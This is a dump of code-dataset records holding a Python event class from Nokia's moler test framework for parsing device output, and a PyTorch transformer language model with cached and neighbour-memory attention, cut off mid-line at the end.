nlpPipeLine(rawEmailCleaner(doc))\n","repo_name":"lfaucon/ada-homeworks","sub_path":"Homework_5/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40341625450","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'Marcin Usielski, Michal Ernst'\n__copyright__ = 'Copyright (C) 2018-2021, Nokia'\n__email__ = 'marcin.usielski@nokia.com, michal.ernst@nokia.com'\n\nimport abc\nimport six\nimport sys\nimport logging\nfrom moler.event import Event\nfrom moler.cmd import 
RegexHelper\n\n\n@six.add_metaclass(abc.ABCMeta)\nclass TextualEvent(Event):\n _default_newline_chars = (\"\\n\", \"\\r\") # New line chars on device, not system with script!\n\n def __init__(self, connection=None, till_occurs_times=-1, runner=None):\n super(TextualEvent, self).__init__(connection=connection, runner=runner, till_occurs_times=till_occurs_times)\n self._last_not_full_line = None\n self._newline_chars = TextualEvent._default_newline_chars\n self._regex_helper = RegexHelper() # Object to regular expression matching\n self._paused = False\n self._ignore_unicode_errors = True # If True then UnicodeDecodeError will be logged not raised in data_received\n self._last_recv_time_data_read_from_connection = None # Time moment when data was really received from\n # connection (not when was passed to event). Time is given as datetime.datetime instance\n\n def event_occurred(self, event_data):\n self._consume_already_parsed_fragment()\n super(TextualEvent, self).event_occurred(event_data)\n\n @abc.abstractmethod\n def on_new_line(self, line, is_full_line):\n \"\"\"\n Method to parse output from device.\n Write your own implementation to do something useful\n :param line: Line to parse, new lines are trimmed\n :param is_full_line: True if new line character was removed from line, False otherwise\n :return: None\n \"\"\"\n\n def data_received(self, data, recv_time):\n \"\"\"\n Called by framework when any data are sent by device.\n\n :param data: List of strings sent by device.\n :param recv_time: time stamp with the moment when the data was read from connection.\n :return: None.\n \"\"\"\n if not self._paused:\n self._last_recv_time_data_read_from_connection = recv_time\n try:\n # Workaround for some terminals and python 2.7\n data = u\"\".join(str(data.encode(\"utf-8\", errors=\"ignore\"))) if sys.version_info < (3, 0) else data\n lines = data.splitlines(True)\n for current_chunk in lines:\n if not self.done():\n line, is_full_line = self._update_from_cached_incomplete_line(current_chunk=current_chunk)\n self._process_line_from_output(line=line, current_chunk=current_chunk,\n is_full_line=is_full_line)\n if self._paused:\n self._last_not_full_line = None\n break\n except UnicodeDecodeError as ex:\n if self._ignore_unicode_errors:\n self._log(lvl=logging.WARNING,\n msg=\"Processing data from '{}' with unicode problem: '{}'.\".format(self, ex))\n else:\n raise ex\n\n def _process_line_from_output(self, current_chunk, line, is_full_line):\n \"\"\"\n Processes line from connection (device) output.\n\n :param current_chunk: Chunk of line sent by connection.\n :param line: Line of output (current_chunk plus previous chunks of this line - if any) without newline char(s).\n :param is_full_line: True if line had newline char(s). False otherwise.\n :return: None.\n \"\"\"\n decoded_line = self._decode_line(line=line)\n self.on_new_line(line=decoded_line, is_full_line=is_full_line)\n\n def _update_from_cached_incomplete_line(self, current_chunk):\n \"\"\"\n Concatenates (if necessary) previous chunk(s) of line and current.\n\n :param current_chunk: line from connection (full line or incomplete one).\n :return: Concatenated (if necessary) line from connection without newline char(s). 
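# --- Hedged toy version (annotation) of the fragment-caching mechanism above:
# TextualEvent keeps a trailing fragment until its newline arrives. The same
# idea with plain strings:
def feed(chunks, newline=("\n", "\r")):
    pending, full_lines = None, []
    for data in chunks:
        for piece in data.splitlines(True):
            line = (pending or "") + piece
            pending = None
            if line.endswith(newline):          # str.endswith accepts a tuple
                full_lines.append(line.rstrip("".join(newline)))
            else:
                pending = line                  # cache the incomplete tail
    return full_lines, pending

print(feed(["ab", "c\nde", "f\n"]))  # (['abc', 'def'], None)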
Flag: True if line had\n newline char(s), False otherwise.\n \"\"\"\n line = current_chunk\n if self._last_not_full_line is not None:\n line = u\"{}{}\".format(self._last_not_full_line, line)\n self._last_not_full_line = None\n is_full_line = self.is_new_line(line)\n if is_full_line:\n line = self._strip_new_lines_chars(line)\n else:\n self._last_not_full_line = line\n return line, is_full_line\n\n def is_new_line(self, line):\n \"\"\"\n Method to check if line has chars of new line at the right side\n :param line: String to check\n :return: True if any new line char was found, False otherwise\n \"\"\"\n if line.endswith(self._newline_chars):\n return True\n return False\n\n def _strip_new_lines_chars(self, line):\n \"\"\"\n :param line: line from device\n :return: line without new lines chars\n \"\"\"\n for char in self._newline_chars:\n line = line.rstrip(char)\n return line\n\n def _consume_already_parsed_fragment(self):\n \"\"\"\n Clear already parsed fragment of line to not parse it twice when another fragment appears on device.\n :return: None\n \"\"\"\n self._last_not_full_line = None\n\n def _decode_line(self, line):\n \"\"\"\n Decodes line if necessary. Put here code to remove colors from terminal etc.\n\n :param line: line from device to decode.\n :return: decoded line.\n \"\"\"\n return line\n\n def pause(self):\n \"\"\"\n Pauses the event. Do not process till resume.\n\n :return: None.\n \"\"\"\n self._paused = True\n self._last_not_full_line = None\n\n def resume(self):\n \"\"\"\n Resumes processing output from connection by the event.\n\n :return: None.\n \"\"\"\n self._paused = False\n","repo_name":"nokia/moler","sub_path":"moler/events/textualevent.py","file_name":"textualevent.py","file_ext":"py","file_size_in_byte":5986,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"78"} +{"seq_id":"3200757731","text":"import sys\nimport math\nfrom copy import deepcopy\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport os\nfrom CRTN.utils.adaptive import AdaptiveEmbedding\nfrom CRTN.utils.fancy_dropout import WeightDropLinear\nfrom CRTN.utils.utils import padding_hidden\nfrom torchnlp.nn import LockedDropout\n\nimport visdom\nimport time\n\nclass PositionalEmbedding(nn.Module):\n def __init__(self, d_model):\n super().__init__()\n \n self.d_model = d_model\n\n inverse_freq = 1 / (10000 ** (torch.arange(0.0, d_model, 2.0) / d_model))\n self.register_buffer(\"inverse_freq\", inverse_freq)\n\n def forward(self, pos_seq):\n\n sinusoid = torch.einsum(\"bi,j->ibj\", pos_seq, self.inverse_freq)\n\n pos_embedding = torch.cat((sinusoid.sin(), sinusoid.cos()), -1)\n\n return pos_embedding\n\ndef bmm_einsum(tensor1, tensor2, eqn=\"ibnd,jbnd->ijbn\"):\n \"\"\"\n bmm version of \n ibnd,jbnd->ijbn\n ilbn,lbnd->ibnd\n kibnd,kjbnd->ikjbn\n\n this version is used to be compatible with apex\n \"\"\"\n if eqn == \"ibnd,jbnd->ijbn\":\n assert tensor1.shape[1:] == tensor2.shape[1:]\n bmm1 = tensor1.reshape(tensor1.size(0), -1, tensor1.size(-1))\n bmm2 = tensor2.reshape(tensor2.size(0), -1, tensor2.size(-1))\n bmm1 = bmm1.permute(1,0,2)\n bmm2 = bmm2.permute(1,2,0)\n ret = torch.bmm(bmm1,bmm2)\n ret = ret.view(tensor1.size(1), tensor1.size(2), *ret.shape[1:])\n return ret.permute(2,3,0,1)\n elif eqn == \"ilbn,lbnd->ibnd\":\n assert tensor1.size(1) == tensor2.size(0) and tensor1.shape[2:] == tensor2.shape[1:3] \n bmm1 = tensor1.reshape(tensor1.size(0), tensor1.size(1), -1)\n bmm2 = tensor2.reshape(tensor2.size(0), 
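# --- Hedged sanity check (annotation) for the "ibnd,jbnd->ijbn" branch of
# bmm_einsum above: the reshape/permute route should match torch.einsum up
# to float tolerance. Shapes are arbitrary test values.
import torch
q = torch.randn(5, 2, 4, 8)   # (i, b, n, d)
k = torch.randn(7, 2, 4, 8)   # (j, b, n, d)
ref = torch.einsum("ibnd,jbnd->ijbn", q, k)
alt = torch.bmm(q.reshape(5, -1, 8).permute(1, 0, 2),
                k.reshape(7, -1, 8).permute(1, 2, 0))
alt = alt.view(2, 4, 5, 7).permute(2, 3, 0, 1)
print(torch.allclose(ref, alt, atol=1e-5))  # True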
-1, tensor2.size(-1))\n bmm1 = bmm1.permute(2,0,1)\n bmm2 = bmm2.permute(1,0,2)\n ret = torch.bmm(bmm1,bmm2)\n ret = ret.view(tensor1.size(2), tensor1.size(3), *ret.shape[1:])\n return ret.permute(2,0,1,3)\n elif eqn == \"kibnd,kjbnd->ikjbn\":\n assert tensor1.size(0) == tensor2.size(0) and tensor1.shape[2:] == tensor2.shape[2:]\n bmm1 = tensor1.permute(0,2,3,1,4)\n bmm2 = tensor2.permute(0,2,3,4,1)\n bmm1 = bmm1.reshape(-1, bmm1.size(-2), bmm1.size(-1))\n bmm2 = bmm2.reshape(-1, bmm2.size(-2), bmm2.size(-1))\n ret = torch.bmm(bmm1,bmm2)\n ret = ret.view(tensor1.size(0), tensor1.size(2), tensor1.size(3), *ret.shape[1:])\n return ret.permute(3,0,4,1,2)\n\n\n\nclass PostionwiseFF(nn.Module):\n def __init__(self, d_model, d_ff, dropfor):\n super().__init__()\n\n self.d_model = d_model\n self.d_ff = d_ff\n\n self.FFNet = nn.Sequential(\n nn.Linear(d_model, d_ff),\n nn.ReLU(inplace=True),\n LockedDropout(dropfor),\n nn.Linear(d_ff, d_model),\n LockedDropout(dropfor)\n )\n\n self.layer_norm = nn.LayerNorm(d_model)\n\n def forward(self, inputs):\n \n output = self.FFNet(inputs)\n output = self.layer_norm(inputs + output)\n\n return output\n\n\nclass MultiheadSelfAttention(nn.Module):\n def __init__(self, num_head, d_model, d_head, dropout):\n super().__init__()\n\n self.num_head = num_head\n self.d_model = d_model\n self.d_head = d_head\n self.dropout = dropout\n\n self.drop = nn.Dropout(dropout)\n\n self.lin_qkv = nn.Linear(d_model, 3 * num_head * d_head, bias=False)\n self.lin_o = nn.Linear(num_head * d_head, d_model, bias=False)\n\n self.layer_norm = nn.LayerNorm(d_model)\n\n self.scale = 1 / (d_head ** 0.5)\n\n def forward(self, x, pos_emb, mask=None, memory=None, indices=None, weights=None):\n\n seq_len = x.size(0)\n \n x = x + pos_emb[-seq_len:]\n\n if memory is not None:\n c = torch.cat((memory, x), 0)\n else:\n c = x\n\n\n total_len, batch_size = c.size(0), c.size(1)\n\n heads_matrix = self.lin_qkv(c)\n\n heads_q, heads_k, heads_v = torch.chunk(heads_matrix, 3, dim=-1)\n\n heads_q = heads_q.view(total_len, batch_size, self.num_head, self.d_head)[-seq_len:]\n heads_k = heads_k.view(total_len, batch_size, self.num_head, self.d_head)\n heads_v = heads_v.view(total_len, batch_size, self.num_head, self.d_head)\n\n attn_score = torch.einsum(\"ibnd,jbnd->ijbn\", heads_q, heads_k)\n attn_score.mul_(self.scale)\n\n if mask is not None and mask.any().item():\n attn_score.masked_fill_(mask[:,:,:,None], -float('inf'))\n\n attn_prob = F.softmax(attn_score, 1)\n\n attn_vec = torch.einsum(\"ijbn,jbnd->ibnd\", attn_prob, heads_v)\n attn_vec = attn_vec.reshape(seq_len, batch_size, self.num_head * self.d_head)\n\n attn_out = self.lin_o(attn_vec)\n attn_out = self.drop(attn_out)\n\n output = self.layer_norm(x + attn_out)\n\n return output\n\nclass LearnableMultiheadSelfAttention(nn.Module):\n def __init__(self, num_head, d_model, d_head, dropatt, dropwei, same_length=True, no_pos=False):\n super().__init__()\n self.num_head = num_head\n self.d_model = d_model\n self.d_head = d_head\n self.same_length = same_length\n self.no_pos = no_pos\n\n self.dropatt = nn.Dropout(dropatt)\n self.dropattout = LockedDropout(dropatt)\n\n #self.lin_q = nn.Linear(d_model, num_head * d_head, bias=False)\n #self.lin_kv = nn.Linear(d_model, 2 * num_head * d_head, bias=False)\n #self.lin_relemb = nn.Linear(d_model, num_head * d_head, bias=False)\n self.lin_q = WeightDropLinear(d_model, num_head * d_head, bias=False,\n weight_dropout=dropwei)\n self.lin_kv = WeightDropLinear(d_model, 2 * num_head * d_head, bias=False,\n 
weight_dropout=dropwei)\n self.lin_relemb = WeightDropLinear(d_model, num_head * d_head, bias=False,\n weight_dropout=dropwei)\n self.lin_o = nn.Linear(num_head * d_head, d_model, bias=False)\n\n self.layer_norm = nn.LayerNorm(d_model)\n\n self.scale = 1 / (d_head ** 0.5)\n\n\n def _rel_shift(self, x):\n x_inp = x.reshape(x.size(0), -1, *x.size()[-2:])\n zero_pad = x_inp.new_zeros((x_inp.size(0), 1, *x_inp.size()[2:]))\n x_padded = torch.cat([zero_pad, x_inp], dim=1)\n\n x_padded = x_padded.view(x_inp.size(1) + 1, x_inp.size(0), *x_inp.size()[2:])\n\n x = x_padded[1:].view_as(x)\n\n return x\n\n\n def forward(self, x, pos_emb, pos_bias_u, pos_bias_v, mask=None, cache=None, indice_bool=None, weights=None, neighbor_mem=None, inf_ind=None, theta=1.0):\n \"\"\"\n 3 usage: \n - compute query\n - compute hidden state\n - inference: ind\n \"\"\"\n x_len, batch_size, nhid = x.size(0), x.size(1), x.size(2)\n\n if inf_ind is not None:\n assert inf_ind >= 0 and inf_ind < x_len\n x = x[inf_ind].unsqueeze(0)\n\n if cache is not None:\n cache_num, cache_L = cache.size(0), cache.size(1)\n cache_len = cache_num * cache_L\n cache = cache.view(cache_num * cache.size(1), -1, nhid)\n if not batch_size == cache.size(1):\n cache.unsqueeze_(1)\n cache = cache.expand(-1, batch_size // cache.size(2), -1, -1)\n cache = cache.reshape(cache.size(0), -1, cache.size(-1))\n cache_matrix = self.lin_kv(cache)\n cache_k, cache_v = torch.chunk(cache_matrix, 2, dim=-1)\n else:\n cache_num = 0\n cache_len = 0\n\n if neighbor_mem is not None:\n nei_len = neighbor_mem.size(0)\n nei_matrix = self.lin_kv(neighbor_mem)\n nei_k, nei_v = torch.chunk(nei_matrix, 2, dim=-1)\n else:\n nei_len = 0\n\n heads_q = self.lin_q(x)\n heads_q = heads_q.view(heads_q.size(0), batch_size, self.num_head, self.d_head)\n heads_qu = heads_q + pos_bias_u if pos_bias_u is not None else heads_q\n heads_qv = heads_q + pos_bias_v if pos_bias_v is not None else heads_q\n\n inp_matrix = self.lin_kv(x)\n inp_k, inp_v = torch.chunk(inp_matrix, 2, dim=-1)\n \n rel_emb_matrix = self.lin_relemb(pos_emb)\n rel_cache, rel_nei, rel_inp = rel_emb_matrix.split([cache_len, nei_len, x_len],\n dim=0)\n\n rel_inp = rel_inp.view(x_len, batch_size, self.num_head, self.d_head)\n inp_k = inp_k.view(x_len, batch_size, self.num_head, self.d_head)\n inp_v = inp_v.view(x_len, batch_size, self.num_head, self.d_head)\n AC = torch.einsum(\"ibnd,jbnd->ijbn\", (heads_qu, inp_k))\n BD = torch.einsum(\"ibnd,jbnd->ijbn\", (heads_qv, rel_inp))\n\n if neighbor_mem is not None:\n nei_k = nei_k.view(nei_len, batch_size, self.num_head, self.d_head)\n nei_v = nei_v.view(nei_len, batch_size, self.num_head, self.d_head)\n rel_nei = rel_nei.view(nei_len, batch_size, self.num_head, self.d_head)\n nei_AC = torch.einsum(\"ibnd,jbnd->ijbn\", (heads_qu, nei_k))\n nei_BD = torch.einsum(\"ibnd,jbnd->ijbn\", (heads_qv, rel_nei))\n\n # if neighbor_mem is empty(0), mask it\n\n if indice_bool is None:\n if neighbor_mem.eq(0).sum() == neighbor_mem.numel():\n nei_mask = torch.cat((mask.new_ones(nei_len), mask.new_zeros(x_len)), 0)\n mask = mask + nei_mask.expand(mask.size(0), -1).unsqueeze(-1)\n\n AC = torch.cat((nei_AC, AC), dim=1)\n BD = torch.cat((nei_BD, BD), dim=1)\n \n \n if indice_bool is not None:\n pre_AC = torch.einsum(\"ibnd,ibk->kibnd\", heads_qu, indice_bool)\n pre_BD = torch.einsum(\"ibnd,ibk->kibnd\", heads_qv, indice_bool)\n cache_k = cache_k.view(cache_num, cache_L, batch_size, self.num_head, self.d_head)\n cache_v = cache_v.view(cache_num, cache_L, batch_size, self.num_head, self.d_head)\n\n 
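# --- Hedged 2-D illustration (annotation) of the _rel_shift trick above:
# padding one zero column and re-viewing shifts row i left by i positions,
# aligning relative-position scores Transformer-XL style. Real inputs are
# 4-D (i, j, b, n); a small matrix makes the effect visible.
import torch
x = torch.arange(12.).view(3, 4)                    # (query, rel_pos) scores
shifted = torch.cat([torch.zeros(3, 1), x], dim=1).view(5, 3)[1:].view_as(x)
print(x)
print(shifted)   # row 0 shifted left by 2, row 1 by 1, row 2 unchanged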
rel_cache = rel_cache.view(cache_num, cache_L, batch_size, self.num_head, self.d_head)\n cache_AC = torch.einsum(\"kibnd,kjbnd->ikjbn\", pre_AC, cache_k)\n cache_BD = torch.einsum(\"kibnd,kjbnd->ikjbn\", pre_BD, rel_cache)\n AC_mask = indice_bool.eq(0).transpose(1, 2)[:,:,None,:,None]\n cache_AC.masked_fill_(AC_mask, -float(\"inf\")) \n\n # if neighbor_mem is empty(0) or cache key is empty(0), mask it\n\n if cache.sum(dim=[1,2]).eq(0).sum() > 0:\n nei_mask = neighbor_mem.eq(0).sum().eq(neighbor_mem.numel()).expand(nei_len)\n cache_mask = cache.eq(0).reshape(cache_len, -1).min(dim=-1)[0]\n mask = mask + torch.cat((cache_mask, nei_mask, mask.new_zeros(x_len)), 0).expand(mask.size(0), -1).unsqueeze(-1)\n\n cache_AC = cache_AC.reshape(cache_AC.size(0), -1, batch_size, self.num_head)\n cache_BD = cache_BD.reshape(cache_BD.size(0), -1, batch_size, self.num_head)\n AC = torch.cat((cache_AC, AC), dim=1)\n BD = torch.cat((cache_BD, BD), dim=1)\n \n \n \n #if indice_bool is None and neighbor_mem is None:\n # rel_emb_matrix = rel_emb_matrix.view(x_len, batch_size, \n # self.num_head, self.d_head)\n # heads_k = heads_k.view(x_len, batch_size, self.num_head, self.d_head)\n # heads_v = heads_v.view(x_len, batch_size, self.num_head, self.d_head)\n # AC = torch.einsum(\"ibnd,jbnd->ijbn\", (heads_qu, heads_k))\n # BD = torch.einsum(\"ibnd,jbnd->ijbn\", (heads_qv, rel_emb_matrix))\n #else:\n # if indice_bool is not None:\n # cache_AC = torch.einsum(\"ibnd,ibk->kibnd\", heads_qu, indice_bool)\n # cache_BD = torch.einsum(\"ibnd,ibk->kibnd\", heads_qv, indice_bool)\n # cache_k = heads_k.view(cache_num + 1, x_len, batch_size, \n # self.num_head, self.d_head)\n # cache_v = heads_v.view(cache_num + 1, x_len, batch_size, \n # self.num_head, self.d_head)\n\n # cache_rel = rel_emb_matrix.view(cache_num + 1, x_len, \n # batch_size, self.num_head, self.d_head)\n # AC = torch.einsum(\"kibnd,kjbnd->ikjbn\", cache_AC, cache_k)\n # BD = torch.einsum(\"kibnd,kjbnd->ikjbn\", cache_BD, cache_rel)\n # AC_mask = indice_bool.eq(0).transpose(1, 2)[:,:,None,:,None]\n # AC.masked_fill_(AC_mask, -float(\"inf\")) \n\n # # if neighbor_mem is empty(0) or cache key is empty(0), mask it\n # if cache.sum(dim=[1,2]).eq(0).sum() > 0:\n # nei_mask = neighbor_mem.eq(0).sum().eq(neighbor_mem.numel()).expand(nei_len)\n # cache_mask = cache.eq(0).reshape(cache_len, -1).min(dim=-1)[0]\n # mask = mask + torch.cat((cache_mask, nei_mask, mask.new_zeros(x_len)), 0).expand(mask.size(0), -1).unsqueeze(-1)\n # else:\n # rel_emb_matrix = rel_emb_matrix.view(x_len, batch_size, \n # self.num_head, self.d_head)\n # heads_k = heads_k.view(x_len, batch_size, self.num_head, \n # self.d_head)\n # heads_v = heads_v.view(x_len, batch_size, self.num_head, \n # self.d_head)\n # AC = torch.einsum(\"ibnd,jbnd->ijbn\", (heads_qu, heads_k))\n # BD = torch.einsum(\"ibnd,jbnd->ijbn\", (heads_qv, rel_emb_matrix))\n\n # # if neighbor_mem is empty(0), mask it\n # if neighbor_mem.eq(0).sum() == neighbor_mem.numel():\n # nei_mask = torch.cat((mask.new_ones(nei_len), mask.new_zeros(x_len)), 0)\n # mask = mask + nei_mask.expand(mask.size(0), -1).unsqueeze(-1)\n # \n # AC.unsqueeze_(1)\n # BD.unsqueeze_(1)\n\n # if neighbor_mem is not None:\n # nei_k = nei_k.view(nei_len, batch_size, self.num_head, self.d_head)\n # nei_v = nei_v.view(nei_len, batch_size, self.num_head, self.d_head)\n # rel_nei = rel_nei.view(nei_len, batch_size, self.num_head, self.d_head)\n # nei_AC = torch.einsum(\"ibnd,jbnd->ijbn\", (heads_qu, nei_k))\n # nei_BD = torch.einsum(\"ibnd,jbnd->ijbn\", (heads_qv, 
rel_nei))\n # \n # AC_cache, AC_inp = AC.split([cache_num, 1], dim=1)\n # BD_cache, BD_inp = BD.split([cache_num, 1], dim=1)\n\n # AC = torch.cat((AC_cache.reshape(\n # AC_cache.size(0), -1, batch_size, self.num_head),\n # nei_AC,\n # AC_inp.squeeze(1)), 1)\n # BD = torch.cat((BD_cache.reshape(\n # BD_cache.size(0), -1, batch_size, self.num_head),\n # nei_BD,\n # BD_inp.squeeze(1)), 1)\n \n if inf_ind is None:\n BD = self._rel_shift(BD)\n else:\n valid_len = BD.size(1) - (x_len - 1 - inf_ind)\n BD[:,:valid_len,:,:] = BD.clone()[:,x_len-1-inf_ind:,:,:]\n\n if self.no_pos:\n attn_score = AC\n else:\n attn_score = AC + BD\n attn_score.mul_(self.scale)\n attn_score.mul_(theta)\n attn_score = attn_score.reshape(attn_score.size(0), -1, \n batch_size, self.num_head)\n\n if inf_ind is not None:\n mask = mask[inf_ind].unsqueeze(0)\n #if indice_bool is not None and self.same_length: \n # # Maybe there is a better way than for\n # cache_ones = mask.new_ones(x_len, cache_len)\n # cache_masks = torch.tril(cache_ones, diagonal=-1).split(cache_L, dim=1)\n # same_length_masks = []\n # for b in range(batch_size):\n # indice_m = indice_bool[:, b, :]\n # mini_masks = []\n # for isel, sel in enumerate(indice_m):\n # tiny_masks = []\n # i = 0\n # for s in sel:\n # if s:\n # tiny_masks.append(cache_masks[i])\n # i += 1\n # else:\n # tiny_masks.append(cache_masks[-1])\n # tiny_mask = torch.cat(tiny_masks, dim=1)\n # mini_masks.append(tiny_mask[isel].unsqueeze(0))\n # mini_mask = torch.cat(mini_masks, dim=0)\n # same_length_masks.append(mini_mask.unsqueeze(0))\n # same_length_mask = torch.cat(same_length_masks, dim=0)\n # same_length_mask = same_length_mask.permute(1, 2, 0)\n # same_length_mask = torch.cat((same_length_mask, mask.new_zeros(x_len, \n # mask.size(1) - same_length_mask.size(1),\n # batch_size)),\n # dim=1)\n # mask = same_length_mask + mask\n\n if mask is not None:\n attn_score.masked_fill_(mask[:,:,:,None], -float('inf'))\n\n attn_prob = F.softmax(attn_score, 1)\n attn_prob = self.dropatt(attn_prob)\n attn_matrix = attn_prob.mean((2, 3))\n\n prob_cache, prob_nei, prob_inp = attn_prob.split([cache_len,\n nei_len,\n x_len], dim=1)\n attn_vec = torch.einsum(\"ilbn,lbnd->ibnd\", prob_inp, inp_v)\n\n if nei_len > 0:\n nei_vec = torch.einsum(\"ilbn,lbnd->ibnd\", prob_nei, nei_v)\n attn_vec = attn_vec + nei_vec\n\n if cache_len > 0:\n if weights is not None:\n prob_cache = prob_cache.reshape(prob_cache.size(0), -1, cache_L, \n batch_size, self.num_head)\n prob_cache = torch.einsum(\"ikjbn,ibk->ikjbn\", prob_cache, weights)\n prob_cache = prob_cache.view(prob_cache.size(0), -1, *prob_cache.shape[3:])\n cache_v = cache_v.view(-1, *cache_v.shape[2:])\n cache_vec = torch.einsum(\"ilbn,lbnd->ibnd\", prob_cache, cache_v)\n attn_vec = attn_vec + cache_vec\n \n\n #if cache is None and neighbor_mem is None:\n # attn_vec = torch.einsum(\"ijbn,jbnd->ibnd\", attn_prob, heads_v)\n #else:\n # if neighbor_mem is not None and nei_len > 0:\n # prob_cache, prob_nei, prob_inp = attn_prob.split([cache_len,\n # nei_len,\n # x_len], dim=1)\n # attn_prob = torch.cat((prob_cache, prob_inp), 1)\n # nei_vec = torch.einsum(\"ilbn,lbnd->ibnd\", prob_nei, nei_v)\n\n # if indice_bool is not None: \n # attn_prob = attn_prob.reshape(attn_prob.size(0), -1, x_len,\n # batch_size, self.num_head)\n # if weights is not None:\n # attn_prob = torch.einsum(\"ikjbn,ibk->ikjbn\", attn_prob, weights)\n # attn_prob = attn_prob.view(attn_prob.size(0), -1, *attn_prob.shape[3:])\n # cache_v = cache_v.view(-1, *cache_v.shape[2:])\n # attn_vec = 
torch.einsum(\"ilbn,lbnd->ibnd\", attn_prob, cache_v)\n # if neighbor_mem is not None and nei_len > 0:\n # attn_vec = attn_vec + nei_vec\n # else:\n # attn_vec = torch.einsum(\"ilbn,lbnd->ibnd\", attn_prob, heads_v)\n # attn_vec = attn_vec + nei_vec\n\n attn_vec = attn_vec.reshape(attn_vec.size(0), batch_size, \n self.num_head * self.d_head)\n\n attn_out = self.lin_o(attn_vec)\n attn_out = self.dropattout(attn_out)\n\n output = self.layer_norm(x + attn_out)\n\n #if indice_bool is not None:\n # if inf_ind is not None:\n # print(\"inf time: %.2f ms\" % ((time.time() - start_time) * 1000))\n # else:\n # print(\"train time: %.2f ms\" % ((time.time() - start_time) * 1000))\n\n return output, attn_matrix\n\n\n\n\n\n\nclass TransformerUnit(nn.Module):\n def __init__(self, num_head, d_model, d_head, d_ff, dropatt, dropwei, dropfor, same_length, no_pos):\n super().__init__()\n\n\n self.attn = LearnableMultiheadSelfAttention(num_head, d_model, d_head, dropatt, \n dropwei, same_length, no_pos)\n\n\n self.pos_ff = PostionwiseFF(d_model, d_ff, dropfor)\n\n def forward(self, inputs, pos_emb, pos_bias_u=None, pos_bias_v=None, mask=None, cache=None, indices=None, weights=None, neighbor_mem=None, inf_ind=None, theta=1.0):\n \n output, attn_matrix = self.attn(inputs, pos_emb, pos_bias_u, pos_bias_v, \n mask=mask, cache=cache, \n indice_bool=indices, \n weights=weights, \n neighbor_mem=neighbor_mem,\n inf_ind=inf_ind,\n theta=theta)\n\n output = self.pos_ff(output)\n\n return output, attn_matrix\n\n\nclass TransformerLM(nn.Module):\n def __init__(self, args, corpus=None):\n super().__init__()\n self.args = deepcopy(args)\n self.batch_size = self.args.batch_size\n\n vocab_size = self.args.vocab_size\n d_embedding = self.args.emsize\n d_model = self.args.nhid\n d_ff = self.args.d_ff\n d_head = self.args.d_head\n num_head = self.args.nhead\n num_layer = self.args.nlayers\n num_steps = self.args.num_steps\n mem_len = self.args.mem_len\n cutoffs = self.args.cutoffs\n div_val = self.args.div_val\n init_std = self.args.init_std\n\n adaptive = self.args.adaptive\n\n \n self.corpus = corpus\n self.demo = self.args.demo\n self.same_length = args.same_length\n self.same_length_query = args.same_length_query\n\n self.theta = self.args.attn_theta\n\n if adaptive:\n self.embedding = AdaptiveEmbedding(vocab_size, d_embedding, d_model, \n cutoffs, div_val=div_val, \n init_std=init_std,\n dropemb=args.dropemb)\n else:\n self.decoder = nn.Linear(d_model, vocab_size, bias=False) \n if args.tied:\n self.embedding = nn.Embedding(vocab_size, \n d_embedding, \n padding_idx=1).from_pretrained(self.decoder.weight)\n self.embedding.weight = self.decoder.weight\n else:\n self.embedding = nn.Embedding(vocab_size, d_embedding, padding_idx=1)\n\n self.pos_emb = PositionalEmbedding(d_model)\n\n self.drophid = LockedDropout(args.drophid)\n self.dropout = LockedDropout(args.dropout)\n self.dropinp = LockedDropout(args.dropinp)\n\n if not args.no_pos and not args.no_pos_bias:\n self.pos_bias_u = nn.Parameter(torch.Tensor(num_head, d_head))\n self.pos_bias_v = nn.Parameter(torch.Tensor(num_head, d_head))\n self.init_weights(init_std)\n else:\n self.pos_bias_u = None\n self.pos_bias_v = None\n\n if args.stat:\n self.select_stat = nn.Parameter(torch.zeros(args.cache_N), \n requires_grad=False)\n self.viz = visdom.Visdom()\n assert self.viz.check_connection()\n\n self.layers = nn.ModuleList()\n\n for i in range(num_layer):\n self.layers.append(TransformerUnit(\n num_head=num_head,\n d_model=d_model,\n d_head=d_head,\n d_ff=d_ff,\n 
dropatt=args.dropatt,\n dropwei=args.dropwei,\n dropfor=args.dropfor,\n same_length=args.same_length,\n no_pos=args.no_pos))\n\n\n\n def init_weights(self, init_std):\n nn.init.normal_(self.pos_bias_u, 0.0, init_std)\n nn.init.normal_(self.pos_bias_v, 0.0, init_std)\n #if not self.args.adaptive:\n # nn.init.normal_(self.embedding.weight, 0.0, init_std)\n # nn.init.normal_(self.decoder.weight, 0.0, init_std)\n\n def init_hidden(self, batch_size):\n return self.init_memory(batch_size)\n\n def set_batch_size(self, batch_size):\n self.batch_size = batch_size\n\n def init_memory(self, batch_size):\n if self.args.mem_len > 0:\n param = next(self.parameters())\n return torch.empty(self.args.nlayers+1, self.args.mem_len, \n batch_size, self.args.nhid, \n dtype=param.dtype, device=param.device)\n else:\n return None\n\n def forward(self, inputs, cache_info=None, values=None, weights=None, indices=None, words=None, draw=False, neighbor_mem=None, inf_ind=None, inf_blocks=None, padding_idx=1):\n #input shape should be seq_len * bsz or seq_len * bsz * emsize\n\n cache_L = self.args.cache_L\n cache_N = self.args.cache_N\n if inputs.dim() == 2:\n word_emb = self.embedding(inputs)\n seq_len, batch_size = inputs.size()\n else:\n word_emb = inputs\n seq_len, batch_size, _ = inputs.size()\n\n if indices is not None:\n mem_len = values.size(0) * values.size(1)\n values = values.view(values.size(0), values.size(1), -1, \n self.args.nlayers+1, self.args.nhid)\n else:\n mem_len = 0\n #zone_bsz = batch_size\n\n if inf_blocks is not None:\n inf_blocks = inf_blocks.transpose(1, 2)\n\n if neighbor_mem is not None:\n nei_len = neighbor_mem.size(1)\n total_len = seq_len + mem_len + nei_len\n else:\n nei_len = 0\n total_len = seq_len + mem_len\n\n \n\n if indices is not None:\n #pos_seq\n pos_indices = torch.cat((indices, \n (torch.ones_like(indices[0]) * values.size(0)\n ).unsqueeze(0)))\n\n pos_seq = torch.arange(total_len-1, -1, -1.0, device=inputs.device)\n if self.args.merge_shift:\n alpha = self.args.merge_alpha\n if alpha == 1.0:\n alpha -= 1e-10\n pos_shift = pos_seq.new_ones(cache_L) * cache_L * alpha / (1 - alpha)\n pos_pad = pos_seq.new_zeros(total_len - cache_L)\n seq_shift = torch.cat((pos_shift, pos_pad), 